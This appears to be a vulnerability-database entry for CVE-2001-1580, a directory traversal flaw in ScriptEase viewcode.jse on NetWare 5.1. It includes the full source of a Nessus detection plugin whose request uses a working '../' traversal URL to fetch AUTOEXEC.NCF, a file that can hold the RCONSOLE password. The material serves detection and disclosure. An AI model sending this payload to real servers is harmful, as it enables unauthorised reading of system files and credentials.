Vulnerabilities > CVE-2001-1580

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
nombas
novell
nessus
NVD
Published: 2001-12-31
Updated: 2017-12-19

Summary

Directory traversal vulnerability in ScriptEase viewcode.jse for Netware 5.1 before 5.1 SP3 allows remote attackers to read arbitrary files via ".." sequences in the query string.

Vulnerable Configurations

Part Description Count
Application
Nombas
2
OS
Novell
2

Nessus

NASL familyNetware
NASL idNOVELL_VIEWCODE.NASL
descriptionThe installed version of Nombas ScriptEase Web Server Edition for NetWare on the remote host fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id12048
published2004-02-06
reporterThis script is Copyright (C) 2002-2018 David Kyger
sourcehttps://www.tenable.com/plugins/nessus/12048
titleNovell NetWare Web Server sewse.nlm (viewcode.jse) Traversal Arbitrary File Access
code
#
# This script was written by David Kyger <[email protected]>
#
# See the Nessus Scripts License for details
#

# Changes by Tenable:
# - Revised plugin title, output formatting, added see also, added solution (9/3/09)


include("compat.inc");

if(description)
{
  script_id(12048);
  script_version ("1.24");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2001-1580");
  script_bugtraq_id(3715);
 
  script_name(english:"Novell NetWare Web Server sewse.nlm (viewcode.jse) Traversal Arbitrary File Access");
  script_summary(english:"Checks for NetWare Web Server Source Disclosure");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a JavaScript application that is
affected by an information disclosure vulnerability." );
  script_set_attribute(attribute:"description", value:
"The installed version of Nombas ScriptEase Web Server Edition for
NetWare on the remote host fails to sanitize input to the 'sewse.nlm'
page and associated 'viewcode.jse' script before using it to display
the source code of a file. 

By passing in a specially crafted URL argument, an attacker can view
the contents of files, even files outside the web root.  This can lead
to disclosure of sensitive information from the affected host, such as
the RCONSOLE password located in AUTOEXEC.NCF." );
  # http://web.archive.org/web/20071023105035/http://www.irmplc.com/index.php/113-Advisory-002
  script_set_attribute(attribute:"see_also", value:"http://www.irmplc.com/index.php/113-Advisory-002");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Dec/204");
  # http://web.archive.org/web/20011205063851/http://support.novell.com/servlet/tidfinder/2959615
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?837eab78");
  script_set_attribute(attribute:"solution", value:"Remove all sample scripts from the web server.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2001/12/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/02/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2001/06/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2002-2020 David Kyger");

  script_family(english:"Netware");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);

if (! get_port_state(port)) exit(0, "Port "+port+" is closed.");
 
   url = "/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf";
   req = http_get(item:url, port:port);
   buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
   if (isnull(buf)) exit(1, "The web server on port "+port+" failed to respond.");

   lbuf = tolower(buf);
   if (
     "AUTOEXEC.NCF" >< buf &&
     (
       report_paranoia == 2 ||
       (
         "bind ipx to" >< lbuf ||
         "ipx internal net" >< lbuf ||
         "load remote " >< lbuf ||
         "set bindery context" >< lbuf ||
         "set time zone" >< lbuf
       )
     )
   )
   {
     if (report_verbosity > 0)
     {
       report = string(
         "\n",
         "Nessus was able to exploit the issue to retrieve the contents of\n",
         "'AUTOEXEC.NCF' on the remote host using the following URL :\n",
         "\n",
         "  ", build_url(port:port, qs:url), "\n"
       );
       if (report_verbosity > 1)
       {
         report += string(
           "\n",
           "Here are its contents :\n",
           "\n",
           crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
           buf,
           crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
         );
       }
       security_warning(port:port, extra:report);
     }
     else security_warning(port);
     exit(0);
    }

exit(0, "The web server listening on port "+port+" is not affected.");

References